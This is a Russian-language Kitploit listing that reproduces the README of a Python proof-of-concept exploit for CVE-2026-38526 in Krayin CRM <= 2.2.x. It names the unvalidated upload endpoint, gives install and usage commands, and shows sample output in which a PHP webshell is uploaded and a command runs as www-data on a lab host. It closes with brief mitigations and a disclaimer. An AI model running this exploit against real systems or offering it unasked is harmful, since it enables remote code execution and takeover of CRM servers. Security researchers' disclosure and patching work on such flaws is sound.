Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-38526 — Python PoC, эксплуатирующий CVE-2026-38526 в Krayin CRM <= 2.2.x: аутентифицируется, загружает PHP-вебшелл через /admin/tinymce/upload и выполняет команды удалённо. | Kitploit
Инструменты/GitHubGitHub/mrdark-ops/cve-2026-38526
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьCTFТестирование на ПроникновениеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubmrdark-ops/cve-2026-38526

CVE-2026-38526

Python PoC, эксплуатирующий CVE-2026-38526 в Krayin CRM <= 2.2.x: аутентифицируется, загружает PHP-вебшелл через /admin/tinymce/upload и выполняет команды удалённо.

Репозиторий
2 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-38526 — Krayin CRM ≤ 2.2.x Authenticated RCE

⚠️ Предупреждение о правовых последствиях: этот код предоставлен исключительно в образовательных целях и для авторизованного тестирования (CTF, bug bounty, частная лаборатория). Автор не несёт ответственности за незаконное использование.

Описание

Krayin CRM (Webkul) ≤ 2.2.x предоставляет endpoint /admin/tinymce/upload, который позволяет аутентифицированному пользователю (даже с низкими привилегиями) загружать файлы без проверки расширения. Файл затем отдаётся из папки storage/, что позволяет выполнить произвольный код PHP.

  • Тип: Arbitrary File Upload → RCE
  • CVSS: 9.9 (Критический)
  • Требуется аутентификация: Да (любая действующая учётная запись)

Установка

git clone https://github.com/<TON_PSEUDO>/cve-2026-38526.git
cd cve-2026-38526
pip install -r requirements.txt

Использование

python3 cve-2026-38526.py -t http://target.tld -u [email protected] -p 'password' -c 'id'

Опции:

ОпцияОписание
-t, --targetКорневой URL цели
-u, --userEmail учётной записи Krayin
-p, --passwordПароль
-c, --commandКоманда для выполнения (по умолчанию: id)
--login-pathПуть для входа (по умолчанию: /admin/login)
--upload-pathПуть для загрузки (по умолчанию: /admin/tinymce/upload)
--timeoutHTTP-таймаут (по умолчанию: 15)

Пример

$ python3 cve-2026-38526.py -t http://billing.nexus.htb \
    -u [email protected] -p 'N27xh!!2ucY04' -c 'id'

[*] Получение CSRF-токена на http://billing.nexus.htb/admin/login
[*] Отправка формы входа
[+] Аутентификация успешна
[*] Загрузка x8f2k1ab.php через http://billing.nexus.htb/admin/tinymce/upload
[+] Webshell доступен: http://billing.nexus.htb/storage/tinymce/x8f2k1ab.php
[*] Выполнение: id

============================================================
[+] Команда: id
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================

Меры противодействия

  • Обновить Krayin CRM до исправленной версии.
  • Ограничить расширения загружаемых файлов (whitelist).
  • Запретить выполнение PHP в папках storage/ и uploads/.
  • Применять принцип наименьших привилегий для учётных записей CRM.

Отказ от ответственности

Этот проект опубликован в целях исследования безопасности. Любое использование против систем без предварительного письменного разрешения является незаконным и строго запрещено.

Скачать инструмент